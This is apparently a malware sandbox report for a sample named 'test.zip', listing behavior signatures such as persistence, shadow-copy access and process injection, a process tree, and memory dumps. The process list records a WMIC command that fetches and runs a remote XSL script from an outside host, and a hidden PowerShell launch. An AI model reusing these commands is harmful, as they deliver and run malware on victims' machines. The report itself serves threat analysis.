Overview

overview

8

task1

 

8

task2

 

8

Resubmissions

13-11-2019 07:33

191113-s6xvalyd5a 0

12-11-2019 15:34

191112-9te2mt6rbs 0

04-11-2019 16:22

191104-pvpshym7va 0

Analysis

  • max time kernel
    113s
  • max time network
    121s
  • resource
    win7v191014

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test.zip

  • Sample

    191113-s6xvalyd5a

  • SHA256

    72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5

Score
N/A

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs 18 IoCs
    persistence
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
    ransomware
  • Drops file in system dir 23 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Executes dropped EXE 3 IoCs
  • Uses Volume Shadow Copy WMI provider 1 IoCs
    ransomware
  • Uses Volume Shadow Copy Service COM API 1 IoCs
    ransomware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Drops startup file 1 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Discovering connected drives
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of AdjustPrivilegeToken
    PID:1440
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:1092
  • C:\Windows\system32\MsiExec.exe
    C:\Windows\system32\MsiExec.exe -Embedding 5E3227A19605220E5186D9912EDC7DB2
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
  • C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:1408
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-371149877153113590519141328335344489392592268871093106461-6052991441860297665"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1868
  • C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding C963818129A4BB594929C274CEE1BC50
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1832
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Uses Task Scheduler COM API
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Uses Volume Shadow Copy WMI provider
    • Uses Volume Shadow Copy Service COM API
    • Suspicious use of AdjustPrivilegeToken
    • Drops startup file
    PID:2068
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-789858890-18778572872138973017121338278-555810284-794943520-623910661475340320"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2076
  • C:\Users\Admin\AppData\Local\Temp\lc815F.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc815F.tmp"
    1⤵
    • Executes dropped EXE
    PID:2196
  • C:\Users\Admin\AppData\Roaming\XEcdt\nvsmartmaxapp.exe
    "C:\Users\Admin\AppData\Roaming\XEcdt\nvsmartmaxapp.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:2436
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:2456
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {ECCABB4A-4F71-4F4A-ABB0-9F224DC46EF0} S-1-5-21-1774239815-1814403401-2200974991-1000:JUEOVPOM\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2608
  • C:\Users\Admin\AppData\Roaming\XEcdt\gup.exe
    C:\Users\Admin\AppData\Roaming\XEcdt\gup.exe
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:2640
  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    1⤵
    • Loads dropped DLL
    PID:2664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1092-13-0x0000000001FA0000-0x0000000001FA4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1092-11-0x0000000001650000-0x0000000001654000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1092-12-0x00000000010E0000-0x00000000010E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1092-15-0x00000000010E0000-0x00000000010E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1092-16-0x0000000001FA0000-0x0000000001FA4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1440-18-0x00000000022B0000-0x00000000022B4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1440-17-0x00000000040A0000-0x00000000040A4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1440-0-0x00000000040A0000-0x00000000040A4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2068-20-0x000000001C500000-0x000000001C504000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2068-21-0x000000001C500000-0x000000001C504000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2456-29-0x0000000003680000-0x0000000003691000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2456-28-0x0000000003270000-0x0000000003281000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2456-25-0x00000000000C0000-0x00000000000C1000-memory.dmp

    Filesize

    4KB

    Download